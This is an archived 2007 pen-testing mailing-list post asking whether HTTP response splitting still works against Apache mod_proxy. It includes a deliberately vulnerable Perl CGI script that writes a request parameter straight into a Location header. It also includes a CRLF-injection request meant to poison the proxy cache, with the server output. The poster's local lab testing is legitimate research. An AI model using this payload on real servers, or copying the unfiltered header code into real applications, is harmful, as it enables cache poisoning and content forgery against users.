Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Pen-Test
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Http splitting working example

from [Gleb Paharenko] Network Security [Permanent Link]
Subject: Http splitting working example
Date: Thu, 29 Nov 2007 17:53:02 +0200 
Hi list.

Hope somebody will spent some time on my question :),
or point me to the right list.

Is http splitting still works in fresh version of common applications
(squid, apache)?

I've wrote sample application (cgi script) vulnerable to it, however
apache mod_proxy just ignores the answer, and initiates a new
connection for  each request.

Chain:

Client (netcat) -> Apache(mod_proxy) -> Apache -> vulnerable cgi.
Proxy is on localhost.
Goal: poison mod_proxy's cache
The cgi is:

#!/usr/bin/perl
use CGI qw(:standard);
print "Status: 302 Moved\nLocation: ".param('name')."\n\n";

The attemt to exploit is:

#nc localhost 80
GET 
http://test.xxx/cgi-bin/1.pl?name=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0a%0aContent-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html>
HTTP/1.1
Host: test.xxx

HTTP/1.1 302 Moved
Date: Thu, xx Nov 2007 xx:25:03 GMT
Server: Apache/2.0.xx (Unix) mod_ssl/2.0.xx OpenSSL/xxx DAV/2
Location: Foo
Content-Length: 0
Content-Type: text/plain
Via: 1.1 client.xxx (Apache/2.xx)

GET http://test.xxx/1.html HTTP/1.1
Host: test.xxx

HTTP/1.1 200 OK
Date: Thu, xx Nov 2007 15:25:09 GMT
Server: Apache/2.xx (Unix) mod_ssl/2.xx OpenSSL/0.xx DAV/2
Last-Modified: Thu, xx Nov 2007 xxx GMT
ETag: "2c8be-2-c4f7b640"
Accept-Ranges: bytes
Content-Length: 2
Content-Type: text/html


1

However, as I've found, mod_proxy initiates a new connection for the
second  GET. That breaks the whole idea to exploit http splitting. Is
it some kind of new protection feature in apache mod_cache?
Please, could anybody provide a brief description of common
applications on which attack is working. It seems vendors have done a
great job (like filtering characters in PHP header, or Tomcat).

-- 
Best regards.
Gleb Pakharenko.

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Http splitting working example, Gleb Paharenko <=
Previous by Date:  Re: VOIP Pen TEST, Martin Parodi
Next by Date:  Re: small hardware (pc, hub) for hidden pen-testing, brian . l . johnson
Previous by Thread:  john logs, sean . hope
Indexes:  [Date] [Thread] [Top] [All Lists]